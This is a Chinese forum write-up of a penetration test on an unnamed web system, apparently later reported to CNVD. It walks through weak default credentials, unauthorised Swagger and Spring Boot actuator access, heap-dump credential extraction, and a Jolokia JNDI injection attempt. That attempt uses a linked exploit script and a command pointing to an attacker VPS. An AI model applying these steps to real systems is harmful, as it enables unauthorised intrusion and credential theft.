No.0
引言
事实上,已经对漏洞进行了基本修复。
No.1
入口
从config.js中获取大量接口,导致漏洞成为一个全面的问题。
![图片[1]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202161930415-image.png)
No.2
弱口令 – dev/DevAdmin
![图片[2]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162024916-image-1024x377.png)
![图片[3]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162111809-image-1024x797.png)
No.3
未授权访问Swagger + 信息泄露
在Swagger中存在大量接口,可以通过这些接口进行功能测试。通过叠加page和pageSize参数,实现未经授权的敏感信息获取。
![图片[4]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162136218-image-1024x800.png)
![图片[5]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162203810-image.png)
No.4
Spring Boot未授权访问
推荐使用工具:JDumpSpider-1.0-SNAPSHOT-full.jar 和 heapdump_tool.jar
/env/heapdump
![图片[6]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162237704-image-1024x382.png)
![图片[7]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162259491-image.png)
对应第一个弱口令,获取其他敏感信息。
![图片[8]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162713148-image-1024x345.png)
No.5
Heapdump文件下载
![图片[9]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162807915-image-1024x409.png)
![图片[10]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162848880-image-1024x384.png)
![图片[11]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202162923520-image-1024x396.png)
No.6
信息泄露
有些人会聪明地更改默认密码,但却忽略了logfile中记录的大量登录日志。通过分析日志,找到对方修改的密码。
![图片[12]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202163008387-image-1024x363.png)
![图片[13]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202163033160-image.png)
No.7
Jolokia JNDI注入
当携带createJNDIRealm参数时,可尝试利用RCE。推荐使用脚本:
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jndi-rce.py
bashCopy code
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A [VPS]
![图片[14]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202163147882-image-1024x375.png)
python3 jolokia.py
![图片[15]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202163201217-image-1024x311.png)
对方反弹回显,但由于对方存在WAF或其他设备,未成功获取shell。
成果展示: 由于通用Web弱口令提交CNVD会转化为事件类型,因此没有提交,仅提交了Heapdump信息泄露漏洞。
![图片[16]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202165116277-image.png)
![图片[17]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202165143294-image-1024x377.png)
![图片[18]-系统安全漏洞深度剖析:修复与挑战-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2023/12/20231202165223664-image.png)
© 版权声明
THE END
![表情[qiudale]-山海云端论坛](https://www.shserve.cn/wp-content/themes/Shanhai/img/smilies/qiudale.gif)
我也是买了领不了、
暂无评论内容